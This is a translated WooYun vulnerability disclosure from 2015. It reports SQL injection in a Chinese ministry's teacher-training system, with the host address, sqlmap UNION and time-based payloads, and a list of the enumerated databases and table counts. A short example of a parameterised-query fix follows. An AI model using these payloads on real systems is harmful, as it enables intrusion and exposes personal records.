Vulnerability summary

Defect ID: wooyun-2015-0113259

Title: A system belonging to the Ministry of Human Resources and Social Security has a serious high-risk vulnerability leaking a large amount of sensitive information

Vendor: Ministry of Human Resources and Social Security of the People's Republic of China

Author: Looke

Submitted: 2015-05-11 10:46

Fixed: 2015-06-29 16:44

Published: 2015-06-29 16:44

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-05-11: Details sent to the vendor, awaiting vendor action
2015-05-15: Vendor confirmed; details visible to the vendor only
2015-05-25: Details disclosed to core white hats and domain experts
2015-06-04: Details disclosed to regular white hats
2015-06-14: Details disclosed to intern white hats
2015-06-29: Details disclosed to the public

Brief description:

A girl made cola chicken wings for a boy.
The boy took a bite and said it was delicious.
The girl took a bite too
and said: liar, it isn't even cooked.
The boy said gently: silly, whatever you make tastes good to me.
A few days later
the boy and the girl died of bird flu.

Detailed description:

The vulnerability is in the Technical College Teacher Training Management System (技工院校师资培训管理系统). I did not dump any data, so please don't invite me for tea.
Vulnerable URL:

116.90.83.207:8088//TrainingInforMS/toIsOrnotWriteSurveyAction.action?majorId=2&numOfPeriod=3&studentInformation.studentName=fd&studentInformation.identifyId=522401164324545234


The studentInformation.studentName parameter is injectable (sqlmap output):

---
Parameter: studentInformation.studentName (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: majorId=2&numOfPeriod=3&studentInformation.studentName=fd' UNION ALL SELECT 43,43,CONCAT(0x71707a7a71,0x55695678464b73547671,0x71717a7a71)#&studentInformation.identifyId=522401164324545234
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: majorId=2&numOfPeriod=3&studentInformation.studentName=fd' AND (SELECT * FROM (SELECT(SLEEP(5)))VMrB) AND 'iMOX'='iMOX&studentInformation.identifyId=522401164324545234
---


Proof of vulnerability:

14 databases in total:

available databases [14]:                                                      
[*] dataacquisition
[*] fw3d
[*] infoapply
[*] information_schema
[*] mtrainingds
[*] mysql
[*] scntrainii
[*] scntrainii_xj
[*] scntrainiizh
[*] sxscntrainii
[*] teset
[*] test
[*] traininginforms
[*] wintrain33


Over a million records are exposed, which is fairly serious.

Database: scntrainii_xj
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| entstu_datum | 31476 |
| actrecord | 25369 |
| soebsjc | 1743 |
| soecszy | 1605 |
| soestuscore | 1605 |
| entclazz_experiment | 1140 |
| entstuscore | 909 |
| thktestoption | 815 |
| soestuattend | 564 |
| thktest | 506 |
| choice | 428 |
| soebusinessresult | 329 |
| uzer | 317 |
| usresult | 227 |
| soestustore | 200 |
| reresult | 198 |
| cptestoption | 174 |
| thkanswer | 174 |
| thkgateconfig | 171 |
| soeturn | 149 |
| entstustep | 139 |
| thkarticle | 110 |
| whrresource | 107 |
| soebs | 95 |
| entdatum | 72 |
| entclazz_casus | 66 |
| testtype | 61 |
| entstep | 60 |
| policyarticle | 48 |
| entscorepercent | 42 |
| whrgate | 41 |
| whrexperiment | 32 |
| entstuprocess | 27 |
| thkscoredetail | 24 |
| soescorepercent | 19 |
| soetfsjxx | 18 |
| taste | 18 |
| clazz | 17 |
| entcensorship | 17 |
| entexperiment | 16 |
| thkgate | 11 |
| college | 10 |
| thkplanbook | 10 |
| thkplantype | 10 |
| entstucompany | 8 |
| industry | 8 |
| whrcommissioner | 8 |
| district | 7 |
| province | 7 |
| thkscoreclass | 6 |
| policygroup | 5 |
| soeindustry | 5 |
| entcompanytype | 4 |
| experiment | 4 |
| purview | 4 |
| thkexperiment | 4 |
| thkgroup | 4 |
| thkindustry | 4 |
| entcasus | 3 |
| entmodule | 3 |
| hrgate | 3 |
| gate | 2 |
| purviewscore | 2 |
| commissioner | 1 |
| entadminarea | 1 |
| hrexperiment | 1 |
| thkfinalbook | 1 |
| thkplandemo | 1 |
+---------------------------------------+---------+
Database: dataacquisition
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| studentscoreinfo | 117889 |
| admininformation | 5 |
+---------------------------------------+---------+
Database: sxscntrainii
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| entstu_datum | 9776 |
| actrecord | 2252 |
| thktestoption | 815 |
| soebsjc | 610 |
| thktest | 506 |
| soecszy | 505 |
| soestuscore | 505 |
| choice | 428 |
| entclazz_experiment | 399 |
| entstuscore | 297 |
| reresult | 198 |
| cptestoption | 174 |
| thkarticle | 109 |
| whrresource | 107 |
| uzer | 101 |
| entdatum | 72 |
| thkgateconfig | 63 |
| testtype | 61 |
| entstep | 60 |
| soestuattend | 57 |
| soestustore | 52 |
| policyarticle | 47 |
| whrgate | 41 |
| soebs | 35 |
| whrexperiment | 32 |
| soeturn | 31 |
| entclazz_casus | 30 |
| thkscoredetail | 24 |
| entscorepercent | 18 |
| soebusinessresult | 18 |
| entexperiment | 16 |
| soetfsjxx | 16 |
| taste | 16 |
| thkgate | 11 |
| thkplantype | 10 |
| industry | 8 |
| whrcommissioner | 8 |
| clazz | 7 |
| entcensorship | 7 |
| soescorepercent | 7 |
| thkscoreclass | 6 |
| policygroup | 5 |
| soeindustry | 5 |
| college | 4 |
| entcompanytype | 4 |
| experiment | 4 |
| purview | 4 |
| thkexperiment | 4 |
| thkgroup | 4 |
| thkindustry | 4 |
| entcasus | 3 |
| entmodule | 3 |
| hrgate | 3 |
| gate | 2 |
| commissioner | 1 |
| entadminarea | 1 |
| entstuprocess | 1 |
| hrexperiment | 1 |
| thkplandemo | 1 |
| usresult | 1 |
+---------------------------------------+---------+
Database: infoapply
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| applynecessary | 173 |
| meetingapplyinfocontent | 48 |
| meetingapplyinformation | 48 |
| messagefile | 41 |
| messageinformation | 40 |
| meetinginformation | 17 |
| `user` | 15 |
| datacontext | 14 |
| datainfor | 14 |
| leavemessage | 14 |
| news | 14 |
| newscontext | 14 |
| designhtmlinformation | 12 |
| applyinformation | 10 |
| collegeapplyinfocontent | 8 |
| collegeapplyinformation | 8 |
| replymessage | 7 |
| newsattachments | 5 |
| dataattachments | 2 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 993 |
| help_topic | 506 |
| help_keyword | 452 |
| help_category | 38 |
| `user` | 2 |
| host | 1 |
+---------------------------------------+---------+
Database: wintrain33
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| entstu_datum | 1125143 |
| attendance | 262456 |
| entstustep | 257821 |
| usresult | 136678 |
| soebsjc | 58643 |
| thkanswer | 51022 |
| soecszy | 48980 |
| soestuscore | 48970 |
| entstuscore | 33852 |
| entclazz_experiment | 20748 |
| soestustore | 11917 |
| uzer | 9647 |
| thkstudentgroup | 9157 |
| entstuprocess | 7563 |
| entstucompany | 6893 |
| studentscoreinfo | 4705 |
| purviewscore | 3786 |
| whrcompany | 3646 |
| thkgateconfig | 3285 |
| soebs | 1825 |
| entclazz_casus | 1095 |
| thktestoption | 811 |
| thkplanbook | 793 |
| entscorepercent | 513 |
| thktest | 508 |
| t_user_class | 461 |
| choice | 428 |
| clazz | 365 |
| soescorepercent | 365 |
| attendancecanshu | 364 |
| whranswer | 311 |
| reresult | 198 |
| taste | 189 |
| thkfinalbook | 179 |
| cptestoption | 174 |
| thkarticle | 112 |
| whrresource | 107 |
| entdatum | 72 |
| testtype | 61 |
| entstep | 60 |
| t_user_college | 53 |
| policyarticle | 44 |
| whrgate | 41 |
| entcensorship | 36 |
| thkscorejudge | 32 |
| whrexperiment | 32 |
| thkscoredetail | 24 |
| college | 18 |
| entexperiment | 16 |
| soetfsjxx | 16 |
| entadminarea | 11 |
| thkgate | 11 |
| thkplantype | 10 |
| industry | 8 |
| whrcommissioner | 8 |
| thkscoreclass | 6 |
| soeindustry | 5 |
| thkindustry | 5 |
| entcompanytype | 4 |
| experiment | 4 |
| purview | 4 |
| thkexperiment | 4 |
| thkgroup | 4 |
| entcasus | 3 |
| entmodule | 3 |
| hrgate | 3 |
| policygroup | 3 |
| gate | 2 |
| thkcomment | 2 |
| adscore | 1 |
| commissioner | 1 |
| hrexperiment | 1 |
+---------------------------------------+---------+
Database: scntrainii
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| entstu_datum | 736388 |
| entstustep | 164129 |
| soebsjc | 119868 |
| usresult | 49705 |
| thkplanbook | 38593 |
| soecszy | 32255 |
| soestuscore | 32255 |
| entstuscore | 22086 |
| thkanswer | 20561 |
| entclazz_experiment | 14022 |
| soestustore | 6601 |
| uzer | 6342 |
| entstuprocess | 5194 |
| entstucompany | 4796 |
| purviewscore | 4455 |
| thkfinalbook | 3671 |
| thkgateconfig | 2214 |
| soebs | 1230 |
| thktestoption | 807 |
| entclazz_casus | 738 |
| thktest | 509 |
| choice | 428 |
| entscorepercent | 411 |
| clazz | 246 |
| soescorepercent | 246 |
| reresult | 198 |
| cptestoption | 174 |
| thkarticle | 124 |
| whrresource | 107 |
| thkcomment | 106 |
| thkstudentgroup | 96 |
| taste | 92 |
| entdatum | 72 |
| testtype | 61 |
| entstep | 60 |
| policyarticle | 49 |
| whrgate | 41 |
| thkscorejudge | 34 |
| whrexperiment | 32 |
| thkscoredetail | 24 |
| entexperiment | 16 |
| entadminarea | 14 |
| entcensorship | 13 |
| thkgate | 11 |
| soetfsjxx | 10 |
| thkplantype | 10 |
| industry | 8 |
| whrcommissioner | 8 |
| policygroup | 6 |
| thkindustry | 6 |
| thkscoreclass | 6 |
| soeindustry | 5 |
| thkplandemo | 5 |
| college | 4 |
| entcompanytype | 4 |
| experiment | 4 |
| purview | 4 |
| thkexperiment | 4 |
| thkgroup | 4 |
| entcasus | 3 |
| entmodule | 3 |
| hrgate | 3 |
| adscore | 2 |
| gate | 2 |
| commissioner | 1 |
| hrexperiment | 1 |
+---------------------------------------+---------+
Database: fw3d
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| userdetailinformation | 997310 |
| useripinformation | 207913 |
| bu_contactinfo | 12 |
| productinformation | 10 |
| system_userinfo | 10 |
| system_role | 3 |
+---------------------------------------+---------+
Database: traininginforms
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| questionanswer | 48909 |
| trainingscheduledetails | 3724 |
| studentinformation | 2577 |
| stutrainschedetailsmapping | 2400 |
| archiveinformation | 1766 |
| documentcontent | 1385 |
| stuphotomapping | 1378 |
| messageinformation | 1159 |
| allocateinformation | 422 |
| teacherinformation | 204 |
| deploymentinformation | 164 |
| userinformation | 111 |
| teacherschedumapping | 99 |
| documentinformation | 64 |
| provinceinformation | 64 |
| questionping | 63 |
| messageboard | 33 |
| experinformation | 23 |
| trainingorganization | 21 |
| majorinformation | 15 |
| questionnaire | 9 |
| news | 6 |
| useprivilege | 6 |
| datalist | 2 |
| company | 1 |
| deploypromapping | 1 |
+---------------------------------------+---------+
Database: scntrainiizh
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| thktestoption | 815 |
| entstu_datum | 520 |
| thktest | 507 |
| choice | 428 |
| reresult | 198 |
| cptestoption | 174 |
| thkarticle | 109 |
| whrresource | 107 |
| thkanswer | 102 |
| thkstudentgroup | 96 |
| entstuscore | 90 |
| entdatum | 72 |
| testtype | 61 |
| entstep | 60 |
| thkplanbook | 59 |
| entclazz_experiment | 57 |
| soebsjc | 55 |
| policyarticle | 46 |
| whrgate | 41 |
| thkscorejudge | 34 |
| whrexperiment | 32 |
| soecszy | 30 |
| soestuscore | 30 |
| usresult | 28 |
| thkscoredetail | 24 |
| entexperiment | 16 |
| soetfsjxx | 16 |
| taste | 16 |
| thkgate | 11 |
| thkplantype | 10 |
| entstuprocess | 9 |
| thkgateconfig | 9 |
| industry | 8 |
| whrcommissioner | 8 |
| uzer | 7 |
| thkscoreclass | 6 |
| policygroup | 5 |
| soebs | 5 |
| soeindustry | 5 |
| thkfinalbook | 5 |
| entcompanytype | 4 |
| experiment | 4 |
| purview | 4 |
| thkcomment | 4 |
| thkexperiment | 4 |
| thkgroup | 4 |
| thkindustry | 4 |
| entcasus | 3 |
| entclazz_casus | 3 |
| entmodule | 3 |
| entscorepercent | 3 |
| hrgate | 3 |
| adscore | 2 |
| gate | 2 |
| purviewscore | 2 |
| thkplandemo | 2 |
| clazz | 1 |
| college | 1 |
| commissioner | 1 |
| entadminarea | 1 |
| entcensorship | 1 |
| entstustep | 1 |
| hrexperiment | 1 |
| soescorepercent | 1 |
| soestustore | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 6644 |
| STATISTICS | 1112 |
| KEY_COLUMN_USAGE | 859 |
| TABLE_CONSTRAINTS | 745 |
| PARTITIONS | 539 |
| TABLES | 539 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 276 |
| SESSION_VARIABLES | 276 |
| REFERENTIAL_CONSTRAINTS | 210 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128 |
| COLLATIONS | 127 |
| PROCESSLIST | 117 |
| USER_PRIVILEGES | 52 |
| CHARACTER_SETS | 36 |
| SCHEMATA | 14 |
| PLUGINS | 10 |
| TRIGGERS | 10 |
| ENGINES | 8 |
+---------------------------------------+---------+
Database: mtrainingds
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| r_sec_role_access | 24 |
| t_sec_account | 24 |
| bird_s_homework | 18 |
| bird_homework | 17 |
| t_sec_access | 2 |
| bird_semester | 1 |
+---------------------------------------+---------+


Remediation:

Filter the input.

Copyright notice: please credit Looke@WooYun when reposting.
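The injection on studentInformation.studentName and the remediation note both come down to how the request parameter reaches the query. The following Python/SQLite example is added here and is not the system's code: it rebuilds the vulnerable lookup beside a parameter-bound version, using a constructed 3-column UNION payload of the same shape as the report's, so the effect of binding rather than filtering can be checked. The table and column names are assumptions.

```python
import sqlite3

# Constructed sample rows standing in for the system's student table; the table
# and column names here are assumptions, not taken from the real application.
SAMPLE_ROWS = [
    ("fd", "522401164324545234", "2"),
    ("wang", "110101199001011234", "3"),
]

# Constructed UNION payload with the same 3-column shape as the report's, but
# written for SQLite (no CONCAT/0x literals, and '--' instead of MySQL's '#').
UNION_PAYLOAD = "fd' UNION ALL SELECT 43,43,'marker'--"


def make_db():
    """In-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE studentinformation "
        "(studentname TEXT, identifyid TEXT, majorid TEXT)"
    )
    conn.executemany("INSERT INTO studentinformation VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, name, ident):
    """Request parameters are spliced into the SQL text (the reported bug class)."""
    sql = (
        "SELECT studentname, identifyid, majorid FROM studentinformation "
        f"WHERE studentname = '{name}' AND identifyid = '{ident}'"
    )
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, name, ident):
    """Same query with bound parameters: the value is data, never SQL syntax."""
    sql = (
        "SELECT studentname, identifyid, majorid FROM studentinformation "
        "WHERE studentname = ? AND identifyid = ?"
    )
    return conn.execute(sql, (name, ident)).fetchall()


if __name__ == "__main__":
    db = make_db()
    ident = "522401164324545234"
    print("vulnerable:", lookup_vulnerable(db, UNION_PAYLOAD, ident))
    print("fixed:     ", lookup_fixed(db, UNION_PAYLOAD, ident))
```

Running it shows the concatenated query returning the attacker-chosen marker row alongside the real student, while the bound version returns nothing for the same input because no student is literally named that string.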


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 11

Confirmed at: 2015-05-15 16:42

Vendor reply:

CNVD has confirmed and reproduced the reported issue; it has been forwarded by CNCERT to the Ministry of Human Resources and Social Security and also reported to the national-level information security coordination authority.

Latest status:

None yet